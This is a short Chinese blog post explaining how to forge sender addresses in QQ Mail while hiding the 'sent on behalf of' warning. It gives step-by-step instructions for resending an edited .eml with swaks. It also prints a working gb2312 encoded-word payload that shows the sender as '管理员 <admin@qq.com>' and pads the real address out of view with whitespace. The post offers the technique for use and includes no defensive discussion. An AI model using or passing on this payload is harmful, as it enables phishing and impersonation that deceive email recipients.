Qq信箱伪造邮件 Fay·D·Flourite

QQ信箱伪造邮件

spf

绕过方法

效果图如下

屏幕截图 2021-10-24 203501.jpg

实际上跟spf没啥关系),试过的会知道,伪造发送者和接受者都没啥难度,但是如果真实的发送者(sender)与显示在邮件中的发送者(header.from)不一样的话,会提示由sender代发。以下为效果

屏幕截图 2021-10-24 203702.jpg

上面的header.from和sender对应于发邮件时的eml格式文件,header.from对应From。

但对于tx邮箱来说,只要header.from中有sender中的地址,就不会提示有代发,然后就是想办法把sender中的地址从sender中消除了,至少不能显示在sender界面中,要不然就没啥可伪造的了。

这里的绕过方法是通过字符集中的空白字符绕过,值得注意的是,我找到的payload使用的是gb2312字符集,而我使用utf-8或者gbk字符集都不能绕过去。

所以我们就要使发送的eml格式文件中的From带有我们真实的发送地址

步骤如下:

  1. 发送一份邮件给自己,可以事先把内容先伪造好
  2. 保存该邮件内容为eml格式
  3. 删除from前的所有内容
  4. 修改from为payload
  5. swaks重新发送邮件给目标

payload:

=?gb2312?B?udzA7dSxIDxhZG1pbkBxcS5jb20+0aGhoaGhoaGhoaGhoaGhoaGhoaGhoQ==?=
=?gb2312?B?oaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGh?=
=?gb2312?B?oaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGh?=
=?gb2312?B?oaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGh?=
=?gb2312?B?oaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGh?=
=?gb2312?B?oaGhoaGhoaGhoaGhoaGhoaGhoaGhoSAgICAgICAgICAgICAgICAgIKGkoaQ=?=
=?gb2312?B?oaQgICAgICAgICAgICAgICAgIKGhICAgICAgIKGkoaShpA==?=  <admin@test.com>

admin@test.com替换发送邮件的地址

这个格式=?gb2312?B?oaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGh?=对应=?字符集?加密方式?加密字符串?=

而上面那段就是空白字符。每一段都会使得地址往后延最后超过长度。